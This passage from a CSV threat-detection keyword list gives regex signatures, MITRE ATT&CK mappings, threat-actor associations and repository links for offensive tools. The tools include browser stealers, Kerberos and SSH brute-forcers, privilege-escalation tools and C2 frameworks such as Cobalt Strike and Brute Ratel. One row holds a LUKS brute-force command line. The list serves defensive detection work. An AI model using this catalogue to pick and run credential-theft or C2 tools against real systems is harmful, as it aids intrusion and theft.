T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36256" "*BrowserSnatch -*",".{0,1000}BrowserSnatch\s\-.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","N/A","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","36257" "*BrowserSnatch executed with *",".{0,1000}BrowserSnatch\sexecuted\swith\s.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. 
A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","#content","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","36258" "*BrowserSnatch v1.0 - A versatile browser data extraction tool*",".{0,1000}BrowserSnatch\sv1\.0\s\-\sA\sversatile\sbrowser\sdata\sextraction\stool.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","#content","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","36259" "*BrowserSnatch.exe*",".{0,1000}BrowserSnatch\.exe.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","1","N/A","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","36260" "*BrowserSnatch64.exe*",".{0,1000}BrowserSnatch64\.exe.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. 
A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","1","N/A","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","36261" "*BrowserSnatch-master.zip*",".{0,1000}BrowserSnatch\-master\.zip.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","1","N/A","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","36262" "*BrowsingHistoryView.cfg*",".{0,1000}BrowsingHistoryView\.cfg.{0,1000}","offensive_tool_keyword","BrowsingHistoryView","BrowsingHistoryView is a utility that reads the history data of different Web browsers","T1217 - T1070 - T1113","TA0009 - TA0005 - TA0007","N/A","GOBLIN PANDA","Discovery","https://www.nirsoft.net/utils/browsing_history_view.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36263" "*BrowsingHistoryView.exe*",".{0,1000}BrowsingHistoryView\.exe.{0,1000}","offensive_tool_keyword","BrowsingHistoryView","BrowsingHistoryView is a utility that reads the history data of different Web browsers","T1217 - T1070 - T1113","TA0009 - TA0005 - TA0007","N/A","GOBLIN PANDA","Discovery","https://www.nirsoft.net/utils/browsing_history_view.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36264" "*browsinghistoryview.exe*",".{0,1000}browsinghistoryview\.exe.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - 
TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","36265" "*BROWSINGHISTORYVIEW.EXE-*.pf*",".{0,1000}BROWSINGHISTORYVIEW\.EXE\-.{0,1000}\.pf.{0,1000}","offensive_tool_keyword","BrowsingHistoryView","BrowsingHistoryView is a utility that reads the history data of different Web browsers","T1217 - T1070 - T1113","TA0009 - TA0005 - TA0007","N/A","GOBLIN PANDA","Discovery","https://www.nirsoft.net/utils/browsing_history_view.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36266" "*BrowsingHistoryView.html*",".{0,1000}BrowsingHistoryView\.html.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","36267" "*browsinghistoryview.zip*",".{0,1000}browsinghistoryview\.zip.{0,1000}","offensive_tool_keyword","BrowsingHistoryView","BrowsingHistoryView is a utility that reads the history data of different Web browsers","T1217 - T1070 - T1113","TA0009 - TA0005 - TA0007","N/A","GOBLIN PANDA","Discovery","https://www.nirsoft.net/utils/browsing_history_view.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36268" "*browsinghistoryview-x64.zip*",".{0,1000}browsinghistoryview\-x64\.zip.{0,1000}","offensive_tool_keyword","BrowsingHistoryView","BrowsingHistoryView is a utility that reads the history data of different Web browsers","T1217 - T1070 - T1113","TA0009 - TA0005 - TA0007","N/A","GOBLIN PANDA","Discovery","https://www.nirsoft.net/utils/browsing_history_view.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36269" "*brun_script_in_mem*",".{0,1000}brun_script_in_mem.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt 
Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","N/A","10","10","218","37","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z","36271" "*brunasadmin*",".{0,1000}brunasadmin.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a 
network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36272" "*Brute forcing passwords for *",".{0,1000}Brute\sforcing\spasswords\sfor\s.{0,1000}","offensive_tool_keyword","SharpBruteForceSSH","simple SSH brute force tool ","T1110.003 - T1078","TA0006 ","N/A","N/A","Credential Access","https://github.com/HernanRodriguez1/SharpBruteForceSSH","1","0","N/A","N/A","9","1","60","10","2024-04-28T17:56:33Z","2024-04-25T20:06:05Z","36273" "*Brute forcing SIDs at *",".{0,1000}Brute\sforcing\sSIDs\sat\s.{0,1000}","offensive_tool_keyword","Slackor","A Golang 
implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","36274" "*Brute/Brute.cs*",".{0,1000}Brute\/Brute\.cs.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","36275" "*Brute/Brute.csproj*",".{0,1000}Brute\/Brute\.csproj.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","36276" "*Brute/Brute.sln*",".{0,1000}Brute\/Brute\.sln.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","36277" "*brute_force_ntlm.sh*",".{0,1000}brute_force_ntlm\.sh.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync 
installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","8","4","337","63","2024-10-01T11:22:01Z","2016-05-20T04:32:41Z","36278" "*bruteforce *.txt*",".{0,1000}bruteforce\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","36279" "*Brute-force Unsuccessful!*",".{0,1000}Brute\-force\sUnsuccessful!.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","0","#content","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","36280" "*bruteforce.go*",".{0,1000}bruteforce\.go.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","36281" "*BruteForce.ps1*",".{0,1000}BruteForce\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. 
","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","36282" "*Brute-Force.ps1*",".{0,1000}Brute\-Force\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","36283" "*Brute-Force.ps1*",".{0,1000}Brute\-Force\.ps1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#windows","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","36284" "*bruteforce_attack(*",".{0,1000}bruteforce_attack\(.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","36285" "*bruteforce_mode_kerberos_mode*",".{0,1000}bruteforce_mode_kerberos_mode.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - 
TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","36286" "*bruteforce_mode_ntlm_mode*",".{0,1000}bruteforce_mode_ntlm_mode.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","36287" "*bruteforce_try_password_or_hash(*",".{0,1000}bruteforce_try_password_or_hash\(.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","36288" "*bruteforce_try_user(*",".{0,1000}bruteforce_try_user\(.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","36289" "*BruteforceCLSIDs.*",".{0,1000}BruteforceCLSIDs\..{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","FoxKitten - APT33 - Volatile Cedar - Sandworm","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","N/A","10","9","844","101","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z","36290" "*bruteForceCombos*",".{0,1000}bruteForceCombos.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth 
bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","36291" "*Brute-force-Instagram-*.git*",".{0,1000}Brute\-force\-Instagram\-.{0,1000}\.git.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/insta-bf","1","1","N/A","N/A","7","1","59","13","2024-04-23T02:47:28Z","2020-11-20T22:22:48Z","36292" "*bruteforce-luks -*",".{0,1000}bruteforce\-luks\s\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","36293" "*bruteforce-luks -t 4 -l 5 -m 5 /dev/sdb1*",".{0,1000}bruteforce\-luks\s\-t\s4\s\-l\s5\s\-m\s5\s\/dev\/sdb1.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","36294" "*bruteforcePackageIDs(*",".{0,1000}bruteforcePackageIDs\(.{0,1000}","offensive_tool_keyword","SCCMSecrets","SCCMSecrets.py aims at exploiting SCCM policies distribution for credentials harvesting - initial access and lateral movement.","T1555 - T1078 - T1070 - T1021","TA0006 - TA0008 - 
TA0001","N/A","N/A","Lateral Movement","https://github.com/synacktiv/SCCMSecrets","1","0","N/A","N/A","8","3","208","22","2024-12-17T14:29:39Z","2024-08-14T09:45:44Z","36295" "*bruteForceUser*",".{0,1000}bruteForceUser.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","36296" "*Bruteloader Box Reflected*",".{0,1000}Bruteloader\sBox\sReflected.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#content","N/A","10","10","N/A","N/A","N/A","N/A","36297" "*bruteloader*",".{0,1000}bruteloader.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36298" "*brute-locadmin *",".{0,1000}brute\-locadmin\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with 
post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","36299" "*brute-ratel-*",".{0,1000}brute\-ratel\-.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36300" "*BruteRatel*.tar.gz*",".{0,1000}BruteRatel.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36301" 
"*BruteRatel*.zip*",".{0,1000}BruteRatel.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36302" "*bruteratel.com/*",".{0,1000}bruteratel\.com\/.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36303" "*bruteratel/*",".{0,1000}bruteratel\/.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36304" 
"*Brute-Ratel-C4*",".{0,1000}Brute\-Ratel\-C4.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36305" "*Brutesploit.git*",".{0,1000}Brutesploit\.git.{0,1000}","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tool","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","N/A","8","741","263","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z","36306" "*BruteSploit/wlist/*",".{0,1000}BruteSploit\/wlist\/.{0,1000}","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. 
